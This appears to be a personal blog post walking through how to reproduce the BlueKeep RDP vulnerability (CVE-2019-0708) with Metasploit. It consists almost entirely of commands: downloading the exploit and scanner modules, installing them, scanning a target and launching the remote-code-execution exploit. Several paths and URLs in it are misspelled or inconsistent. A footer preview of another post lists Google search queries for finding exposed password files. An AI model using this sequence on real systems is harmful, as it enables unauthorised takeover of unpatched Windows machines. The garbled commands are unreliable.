Reproduction CVE-2019-0708

Reproduction CVE_2019_0708

Xx_introduction

  • Please protection,respect,love,”China’s Internet Security Act”!
  • For learning reference only!
  • Please indicate the source!

Ax_Preparation

  1. wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
  2. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
  3. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  4. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  5. cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
  6. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
  7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
  8. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_Scan

  • MSF update1 apt-get update
    2 apt-get install metasploit-framework
  • 复制代码

    1 su root
    2 msfconsole
    3 reload_all
    4 search 0708
    5 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    6 set rhosts xxx
    7 run

    复制代码

    img

Cx_Exploit

1 use windows/rdp/cve_2019_0708_bluekeep_rce 2 set rhost xxx 3 set target xxx 4 set rport 3389 5 exploit

img

  • once again

img

img

img


   转载规则


《Reproduction CVE-2019-0708》 Enomothem 采用 知识共享署名 4.0 国际许可协议 进行许可。
 本篇
Reproduction CVE-2019-0708 Reproduction CVE-2019-0708
Reproduction CVE_2019_0708Xx_introduction Please protection,respect,love,”China’s Internet Security Act”! For learning r
2019-09-13 Enomothem
下一篇 
Google Hacker语法 Google Hacker语法
“Login: ” “password =” filetype: xls ( 搜索存储在excel文件中含有password的数据)。 allinurl: auth_user_file.txt (搜索包含在服务器上的 auth_user_f
2019-08-15 Enomothem
  目录